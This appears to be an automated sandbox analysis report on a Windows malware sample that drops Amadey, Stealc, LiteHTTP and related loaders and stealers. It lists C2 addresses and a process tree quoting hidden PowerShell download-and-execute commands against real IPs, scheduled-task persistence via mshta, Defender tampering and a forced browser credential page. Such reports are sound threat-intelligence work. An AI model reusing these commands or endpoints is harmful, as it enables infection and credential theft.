Overview

overview

10

Static

static

5

3f8fba6c55...47.exe

windows7-x64

10

3f8fba6c55...47.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    05/03/2025, 20:59

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    3f8fba6c55005a7dc441c57cb7099c0c77d5df62c495e1fcbf17ab06291b4247.exe

  • Size

    938KB

  • MD5

    1fa9c173c6abaae5709ca4b88db07aa5

  • SHA1

    dc77a5b0aeede04510ad4604ff58af13fd377609

  • SHA256

    3f8fba6c55005a7dc441c57cb7099c0c77d5df62c495e1fcbf17ab06291b4247

  • SHA512

    8bf7ea16e4ac88460842de1ab9abeeccb930d1bd309a8d06e2e33fab96cdd8a6f7a001dede7eedbe3511cba20e8799591e45a1a00bb484899bc255f3af811534

  • SSDEEP

    24576:OqDEvCTbMWu7rQYlBQcBiT6rprG8a09u:OTvC/MTQYxsWR7a09

Score
10/10
amadeygcleanerhealerlitehttpstealc092155trumpbotdefense_evasiondiscoverydropperevasionexecutionloaderpersistencespywarestealertrojan

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

stealc

Botnet

trump

C2

http://45.93.20.28

Attributes
  • url_path

    /85a1cacf11314eb8.php

Extracted

Family

litehttp

Version

v1.0.9

C2

http://185.208.156.162/page.php

Attributes
  • key

    v1d6kd29g85cm8jp4pv8tvflvg303gbl

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

    trojanamadey
  • Amadey family
    amadey
  • Detects Healer an antivirus disabler dropper 2 IoCs
  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

    loadergcleaner
  • Gcleaner family
    gcleaner
  • Healer

    Healer an antivirus disabler dropper.

    dropperhealer
  • Healer family
    healer
  • LiteHTTP

    LiteHTTP is an open-source bot written in C#.

    stealerbotlitehttp
  • Litehttp family
    litehttp
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
    evasiontrojan
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
    defense_evasiontrojan
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
    evasiontrojan
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
    defense_evasiontrojan
  • Stealc

    Stealc is an infostealer written in C++.

    stealerstealc
  • Stealc family
    stealc
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 12 IoCs
    defense_evasion
  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

    Using powershell.exe command.

    execution
  • Downloads MZ/PE file 22 IoCs
  • .NET Reactor proctector 2 IoCs

    Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

  • Checks BIOS information in registry 2 TTPs 24 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 27 IoCs
  • Identifies Wine through registry keys 2 TTPs 12 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

    defense_evasion
  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

    spywarestealer
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Windows security modification 2 TTPs 2 IoCs
    defense_evasiontrojan
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Adds Run key to start application 2 TTPs 7 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • AutoIT Executable 2 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 11 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Windows directory 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 8 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 49 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
    defense_evasion
  • Kills process with taskkill 5 IoCs
    defense_evasion
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
    adwarespyware
  • Modifies registry class 1 IoCs
  • Modifies system certificate store 2 TTPs 5 IoCs
    defense_evasionspywaretrojan
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 43 IoCs
  • Suspicious use of AdjustPrivilegeToken 18 IoCs
  • Suspicious use of FindShellTrayWindow 21 IoCs
  • Suspicious use of SendNotifyMessage 19 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Users\Admin\AppData\Local\Temp\3f8fba6c55005a7dc441c57cb7099c0c77d5df62c495e1fcbf17ab06291b4247.exe
    "C:\Users\Admin\AppData\Local\Temp\3f8fba6c55005a7dc441c57cb7099c0c77d5df62c495e1fcbf17ab06291b4247.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:2076
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /create /tn 87tdHmaX0nr /tr "mshta C:\Users\Admin\AppData\Local\Temp\15M4G5FNd.hta" /sc minute /mo 25 /ru "Admin" /f
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2244
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /create /tn 87tdHmaX0nr /tr "mshta C:\Users\Admin\AppData\Local\Temp\15M4G5FNd.hta" /sc minute /mo 25 /ru "Admin" /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Scheduled Task/Job: Scheduled Task
        PID:2540
    • C:\Windows\SysWOW64\mshta.exe
      mshta C:\Users\Admin\AppData\Local\Temp\15M4G5FNd.hta
      2⤵
      • System Location Discovery: System Language Discovery
      • Modifies Internet Explorer settings
      • Suspicious use of WriteProcessMemory
      PID:2892
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'NFPIDTXFHRMGEA6SQNQNMFP3CKEWIZM2.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Downloads MZ/PE file
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2332
        • C:\Users\Admin\AppData\Local\TempNFPIDTXFHRMGEA6SQNQNMFP3CKEWIZM2.EXE
          "C:\Users\Admin\AppData\Local\TempNFPIDTXFHRMGEA6SQNQNMFP3CKEWIZM2.EXE"
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Loads dropped DLL
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Drops file in Windows directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of WriteProcessMemory
          PID:2728
          • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
            "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Downloads MZ/PE file
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Loads dropped DLL
            • Adds Run key to start application
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:2020
            • C:\Users\Admin\AppData\Local\Temp\10106470101\zY9sqWs.exe
              "C:\Users\Admin\AppData\Local\Temp\10106470101\zY9sqWs.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:3016
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 3016 -s 1040
                7⤵
                • Loads dropped DLL
                • Program crash
                PID:2540
            • C:\Users\Admin\AppData\Local\Temp\10106670101\51f7b9b684.exe
              "C:\Users\Admin\AppData\Local\Temp\10106670101\51f7b9b684.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SendNotifyMessage
              • Suspicious use of WriteProcessMemory
              PID:1864
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c schtasks /create /tn tSBw5maorbK /tr "mshta C:\Users\Admin\AppData\Local\Temp\uTSWxz0Yk.hta" /sc minute /mo 25 /ru "Admin" /f
                7⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:628
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /create /tn tSBw5maorbK /tr "mshta C:\Users\Admin\AppData\Local\Temp\uTSWxz0Yk.hta" /sc minute /mo 25 /ru "Admin" /f
                  8⤵
                  • System Location Discovery: System Language Discovery
                  • Scheduled Task/Job: Scheduled Task
                  PID:836
              • C:\Windows\SysWOW64\mshta.exe
                mshta C:\Users\Admin\AppData\Local\Temp\uTSWxz0Yk.hta
                7⤵
                • System Location Discovery: System Language Discovery
                • Modifies Internet Explorer settings
                • Suspicious use of WriteProcessMemory
                PID:2192
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'VS6JYJDFRACRGUYZTVLNFKEJPHBBMRWW.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                  8⤵
                  • Blocklisted process makes network request
                  • Command and Scripting Interpreter: PowerShell
                  • Downloads MZ/PE file
                  • Loads dropped DLL
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:2524
                  • C:\Users\Admin\AppData\Local\TempVS6JYJDFRACRGUYZTVLNFKEJPHBBMRWW.EXE
                    "C:\Users\Admin\AppData\Local\TempVS6JYJDFRACRGUYZTVLNFKEJPHBBMRWW.EXE"
                    9⤵
                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                    • Checks BIOS information in registry
                    • Executes dropped EXE
                    • Identifies Wine through registry keys
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                    • Suspicious behavior: EnumeratesProcesses
                    PID:1300
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c ""C:\Users\Admin\AppData\Local\Temp\10106680121\am_no.cmd" "
              6⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:1508
              • C:\Windows\SysWOW64\timeout.exe
                timeout /t 2
                7⤵
                • System Location Discovery: System Language Discovery
                • Delays execution with timeout.exe
                PID:2056
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                7⤵
                • System Location Discovery: System Language Discovery
                PID:2996
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2896
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                7⤵
                • System Location Discovery: System Language Discovery
                PID:2876
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2868
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                7⤵
                • System Location Discovery: System Language Discovery
                PID:2332
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2648
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /create /tn "QB8c5maXb3p" /tr "mshta \"C:\Temp\jVnN29abX.hta\"" /sc minute /mo 25 /ru "Admin" /f
                7⤵
                • System Location Discovery: System Language Discovery
                • Scheduled Task/Job: Scheduled Task
                PID:2780
              • C:\Windows\SysWOW64\mshta.exe
                mshta "C:\Temp\jVnN29abX.hta"
                7⤵
                • System Location Discovery: System Language Discovery
                • Modifies Internet Explorer settings
                PID:2668
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                  8⤵
                  • Blocklisted process makes network request
                  • Command and Scripting Interpreter: PowerShell
                  • Downloads MZ/PE file
                  • Loads dropped DLL
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2684
                  • C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
                    "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                    9⤵
                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                    • Checks BIOS information in registry
                    • Executes dropped EXE
                    • Identifies Wine through registry keys
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                    • Suspicious behavior: EnumeratesProcesses
                    PID:548
            • C:\Users\Admin\AppData\Local\Temp\10106720101\7ece595e42.exe
              "C:\Users\Admin\AppData\Local\Temp\10106720101\7ece595e42.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:2736
              • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                7⤵
                • Downloads MZ/PE file
                • Loads dropped DLL
                • System Location Discovery: System Language Discovery
                PID:2244
            • C:\Users\Admin\AppData\Local\Temp\10106730101\d20f842ca5.exe
              "C:\Users\Admin\AppData\Local\Temp\10106730101\d20f842ca5.exe"
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              • Suspicious use of AdjustPrivilegeToken
              PID:2328
              • C:\Users\Admin\AppData\Local\Temp\10106730101\d20f842ca5.exe
                "C:\Users\Admin\AppData\Local\Temp\10106730101\d20f842ca5.exe"
                7⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                PID:1272
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 1272 -s 1020
                  8⤵
                  • Loads dropped DLL
                  • Program crash
                  PID:340
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 2328 -s 508
                7⤵
                • Loads dropped DLL
                • Program crash
                PID:2596
            • C:\Users\Admin\AppData\Local\Temp\10106740101\aa693c20c2.exe
              "C:\Users\Admin\AppData\Local\Temp\10106740101\aa693c20c2.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • System Location Discovery: System Language Discovery
              PID:2956
              • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                7⤵
                • Downloads MZ/PE file
                • Loads dropped DLL
                • System Location Discovery: System Language Discovery
                PID:2548
            • C:\Users\Admin\AppData\Local\Temp\10106750101\eba65d1d30.exe
              "C:\Users\Admin\AppData\Local\Temp\10106750101\eba65d1d30.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Modifies system certificate store
              • Suspicious behavior: EnumeratesProcesses
              PID:1740
            • C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe
              "C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe"
              6⤵
              • Executes dropped EXE
              PID:1004
              • C:\Windows\system32\cmd.exe
                "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\BC6C.tmp\BC6D.tmp\BC6E.bat C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe"
                7⤵
                  PID:836
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\Admin\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\Admin\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"
                    8⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1700
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\installer.ps1"
                      9⤵
                      • Command and Scripting Interpreter: PowerShell
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1576
              • C:\Users\Admin\AppData\Local\Temp\10106780101\f831ef21a9.exe
                "C:\Users\Admin\AppData\Local\Temp\10106780101\f831ef21a9.exe"
                6⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Identifies Wine through registry keys
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                PID:2624
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 2624 -s 1200
                  7⤵
                  • Loads dropped DLL
                  • Program crash
                  PID:1616
              • C:\Users\Admin\AppData\Local\Temp\10106790101\eeea2c0482.exe
                "C:\Users\Admin\AppData\Local\Temp\10106790101\eeea2c0482.exe"
                6⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Identifies Wine through registry keys
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                PID:1064
              • C:\Users\Admin\AppData\Local\Temp\10106800101\7093c1f919.exe
                "C:\Users\Admin\AppData\Local\Temp\10106800101\7093c1f919.exe"
                6⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of FindShellTrayWindow
                • Suspicious use of SendNotifyMessage
                PID:1032
                • C:\Windows\SysWOW64\taskkill.exe
                  taskkill /F /IM firefox.exe /T
                  7⤵
                  • System Location Discovery: System Language Discovery
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1052
                • C:\Windows\SysWOW64\taskkill.exe
                  taskkill /F /IM chrome.exe /T
                  7⤵
                  • System Location Discovery: System Language Discovery
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1504
                • C:\Windows\SysWOW64\taskkill.exe
                  taskkill /F /IM msedge.exe /T
                  7⤵
                  • System Location Discovery: System Language Discovery
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3044
                • C:\Windows\SysWOW64\taskkill.exe
                  taskkill /F /IM opera.exe /T
                  7⤵
                  • System Location Discovery: System Language Discovery
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1916
                • C:\Windows\SysWOW64\taskkill.exe
                  taskkill /F /IM brave.exe /T
                  7⤵
                  • System Location Discovery: System Language Discovery
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1936
                • C:\Program Files\Mozilla Firefox\firefox.exe
                  "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                  7⤵
                    PID:2224
                    • C:\Program Files\Mozilla Firefox\firefox.exe
                      "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                      8⤵
                      • Checks processor information in registry
                      • Modifies registry class
                      • Suspicious use of AdjustPrivilegeToken
                      • Suspicious use of FindShellTrayWindow
                      • Suspicious use of SendNotifyMessage
                      PID:636
                      • C:\Program Files\Mozilla Firefox\firefox.exe
                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="636.0.1060569481\647303324" -parentBuildID 20221007134813 -prefsHandle 1208 -prefMapHandle 1200 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {aed649f7-cf73-4852-b31f-71412d67fa40} 636 "\\.\pipe\gecko-crash-server-pipe.636" 1284 46ef558 gpu
                        9⤵
                          PID:2432
                        • C:\Program Files\Mozilla Firefox\firefox.exe
                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="636.1.1273430422\1444582335" -parentBuildID 20221007134813 -prefsHandle 1476 -prefMapHandle 1472 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {2e66fd8c-be6d-4fa3-acd3-04c4b5ec5408} 636 "\\.\pipe\gecko-crash-server-pipe.636" 1488 d71258 socket
                          9⤵
                            PID:1564
                          • C:\Program Files\Mozilla Firefox\firefox.exe
                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="636.2.469860085\326288266" -childID 1 -isForBrowser -prefsHandle 2064 -prefMapHandle 2060 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 860 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {26186f5e-302b-4746-a497-87e9b3f9c082} 636 "\\.\pipe\gecko-crash-server-pipe.636" 2076 19d8d658 tab
                            9⤵
                              PID:2912
                            • C:\Program Files\Mozilla Firefox\firefox.exe
                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="636.3.1831267843\1460391090" -childID 2 -isForBrowser -prefsHandle 2940 -prefMapHandle 2936 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 860 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e6f16a3e-f87a-44ce-b795-577abc62883c} 636 "\\.\pipe\gecko-crash-server-pipe.636" 2952 d63658 tab
                              9⤵
                                PID:2876
                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="636.4.1585189884\863238637" -childID 3 -isForBrowser -prefsHandle 3444 -prefMapHandle 3440 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 860 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8b182073-c45d-4670-a920-c085b7090e23} 636 "\\.\pipe\gecko-crash-server-pipe.636" 3696 1f63e958 tab
                                9⤵
                                  PID:2748
                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="636.5.384292402\1804995797" -childID 4 -isForBrowser -prefsHandle 3824 -prefMapHandle 3828 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 860 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {5531b395-033d-426e-b3de-7e2bd62d25ed} 636 "\\.\pipe\gecko-crash-server-pipe.636" 3812 1f63d758 tab
                                  9⤵
                                    PID:996
                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="636.6.1086096048\760004681" -childID 5 -isForBrowser -prefsHandle 4024 -prefMapHandle 4028 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 860 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {9933e924-53f0-4c41-a534-010b0901e13f} 636 "\\.\pipe\gecko-crash-server-pipe.636" 4012 1f63f558 tab
                                    9⤵
                                      PID:2276
                              • C:\Users\Admin\AppData\Local\Temp\10106810101\e45f20b736.exe
                                "C:\Users\Admin\AppData\Local\Temp\10106810101\e45f20b736.exe"
                                6⤵
                                • Modifies Windows Defender DisableAntiSpyware settings
                                • Modifies Windows Defender Real-time Protection settings
                                • Modifies Windows Defender TamperProtection settings
                                • Modifies Windows Defender notification settings
                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                • Checks BIOS information in registry
                                • Executes dropped EXE
                                • Identifies Wine through registry keys
                                • Windows security modification
                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                • System Location Discovery: System Language Discovery
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1780
                              • C:\Windows\SysWOW64\cmd.exe
                                "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10106821121\PcAIvJ0.cmd"
                                6⤵
                                • System Location Discovery: System Language Discovery
                                PID:3196
                              • C:\Users\Admin\AppData\Local\Temp\10106830101\v6Oqdnc.exe
                                "C:\Users\Admin\AppData\Local\Temp\10106830101\v6Oqdnc.exe"
                                6⤵
                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                • Checks BIOS information in registry
                                • Executes dropped EXE
                                • Identifies Wine through registry keys
                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                • System Location Discovery: System Language Discovery
                                • Suspicious behavior: EnumeratesProcesses
                                PID:3324
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3324 -s 1204
                                  7⤵
                                  • Loads dropped DLL
                                  • Program crash
                                  PID:3500
                              • C:\Users\Admin\AppData\Local\Temp\10106840101\MCxU5Fj.exe
                                "C:\Users\Admin\AppData\Local\Temp\10106840101\MCxU5Fj.exe"
                                6⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                • Suspicious use of SetThreadContext
                                • System Location Discovery: System Language Discovery
                                PID:3620
                                • C:\Users\Admin\AppData\Local\Temp\10106840101\MCxU5Fj.exe
                                  "C:\Users\Admin\AppData\Local\Temp\10106840101\MCxU5Fj.exe"
                                  7⤵
                                  • Executes dropped EXE
                                  • System Location Discovery: System Language Discovery
                                  PID:3656
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 3656 -s 1020
                                    8⤵
